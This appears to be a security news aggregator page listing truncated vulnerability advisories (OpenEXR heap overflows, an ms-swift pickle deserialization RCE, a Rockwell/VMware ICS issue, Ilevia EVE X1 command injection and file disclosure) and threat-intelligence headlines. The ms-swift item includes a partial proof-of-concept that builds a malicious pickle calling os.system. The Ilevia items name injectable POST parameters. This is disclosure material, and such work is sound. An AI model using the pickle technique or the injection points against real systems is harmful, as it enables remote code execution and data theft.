Tag

#mac

GHSA-4r7w-q3jg-ff43: OpenEXR Out of Bounds Heap Read due to Bad Pointer Arithmetic in LossyDctDecoder_execute

### Summary

The OpenEXRCore code is vulnerable to a heap-based buffer overflow during a read operation due to bad pointer math when decompressing DWAA-packed scan-line EXR files with a maliciously forged chunk.

### Details

In the `LossyDctDecoder_execute` function (from `src/lib/OpenEXRCore/internal_dwa_decoder.h`, when SSE2 is enabled), the following code is used to copy data from the chunks:

```cpp
// no-op conversion to linear
for (int y = 8 * blocky; y < 8 * blocky + maxY; ++y)
{
    __m128i* restrict dst = (__m128i *) chanData[comp]->_rows[y];
    __m128i const * restrict src = (__m128i const *)&rowBlock[comp][(y & 0x7) * 8];

    for (int blockx = 0; blockx < numFullBlocksX; ++blockx)
    {
        _mm_storeu_si128 (dst, _mm_loadu_si128 (src));
        //
        src += 8 * 8; // <--- si128 pointer incremented as a uint16_t
        dst += 8;
    }
}
```

The issue arises because the `src` pointer, which is a `si128` pointer, is incremented by `8*8`, as if it were a `uint16_t` pointer...

GHSA-h45x-qhg2-q375: OpenEXR Heap-Based Buffer Overflow in Deep Scanline Parsing via Forged Unpacked Size

### Summary

The OpenEXRCore code is vulnerable to a heap-based buffer overflow during a write operation when decompressing ZIPS-packed deep scan-line EXR files with a maliciously forged chunk header.

### Details

When parsing `STORAGE_DEEP_SCANLINE` chunks from an EXR file, the following code (from `src/lib/OpenEXRCore/chunk.c`) is used to extract the chunk information:

```cpp
if (part->storage_mode == EXR_STORAGE_DEEP_SCANLINE)
    // SNIP...
    cinfo->sample_count_data_offset = dataoff;
    cinfo->sample_count_table_size = (uint64_t) ddata[0];
    cinfo->data_offset = dataoff + (uint64_t) ddata[0];
    cinfo->packed_size = (uint64_t) ddata[1];
    cinfo->unpacked_size = (uint64_t) ddata[2];
    // SNIP...
```

Because this information is stored, the code that later decompresses and reconstructs the chunk bytes knows how much space the uncompressed data will occupy. This size is carried along in the chain of decoding/decompression...

The Booker Prize Longlist and Hacker Summer Camp

This week Bill connects the hype of literary awards to cybersecurity conference season. We highlight key insights from the Q2 2025 IR Trends report, including phishing trends, new ransomware strains, and top targeted sectors. Finally, check out all the places Talos will be at Black Hat.

The Kremlin's Most Devious Hacking Group Is Using Russian ISPs to Plant Spyware

The FSB cyberespionage group known as Turla seems to have used its control of Russia's network infrastructure to meddle with web traffic and trick diplomats into infecting their computers.

GHSA-r54c-2xmf-2cf3: MS SWIFT Deserialization RCE Vulnerability

This appears to be a security vulnerability report describing a remote code execution (RCE) exploit in the ms-swift framework through malicious pickle deserialization in adapter model files. The vulnerability allows arbitrary command execution when loading specially crafted adapter models from ModelScope. This occurs when the machine's torch version is < 2.6.0, while ms-swift accepts torch versions >= 2.0.

**I. Detailed Description:**

1. Install ms-swift

```
pip install ms-swift -U
```

2. Start web-ui

```
swift web-ui --lang en
```

3. After startup, you can access [http://localhost:7860/](http://localhost:7860/) through your browser to see the launched fine-tuning framework program

4. Upload an adapter model repository (cyjhhh/lora_adapter_4_llama3) on ModelScope, where the lora/adapter_model.bin file is generated through the following code:

```python
import torch, pickle, os

class MaliciousPayload:
    def __reduce__(self):
        return (os.system, ("touch /tmp/malicious.txt",))

# A...
```

Rockwell Automation Lifecycle Services with VMware

1. EXECUTIVE SUMMARY

- CVSS v4 9.4
- ATTENTION: Low attack complexity
- Vendor: Rockwell Automation
- Equipment: Lifecycle Services with VMware
- Vulnerabilities: Out-of-bounds Write, Use of Uninitialized Resource

2. RISK EVALUATION

Successful exploitation of these vulnerabilities could lead to code execution on the host or leakage of memory from processes communicating with vSockets.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

Rockwell Automation reports the following Lifecycle Services with VMware are affected:

- Industrial Data Center (IDC) with VMware: Generations 1 – 4
- VersaVirtual Appliance (VVA) with VMware: Series A & B
- Threat Detection Managed Services (TDMS) with VMware: All versions
- Endpoint Protection Service with Rockwell Automation Proxy & VMware only: All versions
- Engineered and Integrated Solutions with VMware: All versions

3.2 Vulnerability Overview

3.2.1 Out-of-bounds Write CWE-787

An integer-overflow vulnerability exists in the VMXNET3 virtual network adapter used in VM...

Ilevia EVE X1 Server 4.7.18.0.eden Neuro-Core Unauth Code Invasion

The EVE X1 server suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'passwd' HTTP POST parameter in /ajax/php/login.php script.

Ilevia EVE X1 Server 4.7.18.0.eden (db_log) Pre-Auth File Disclosure

The controller suffers from an unauthenticated file disclosure vulnerability. Using the 'db_log' POST parameter, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.

UNC2891 Breaches ATM Network via 4G Raspberry Pi, Tries CAKETAP Rootkit for Fraud

The financially motivated threat actor known as UNC2891 has been observed targeting Automatic Teller Machine (ATM) infrastructure using a 4G-equipped Raspberry Pi as part of a covert attack. The cyber-physical attack involved the adversary leveraging their physical access to install the Raspberry Pi device and have it connected directly to the same network switch as the ATM, effectively placing

Using LLMs as a reverse engineering sidekick

LLMs may serve as powerful assistants to malware analysts to streamline workflows, enhance efficiency, and provide actionable insights during malware analysis.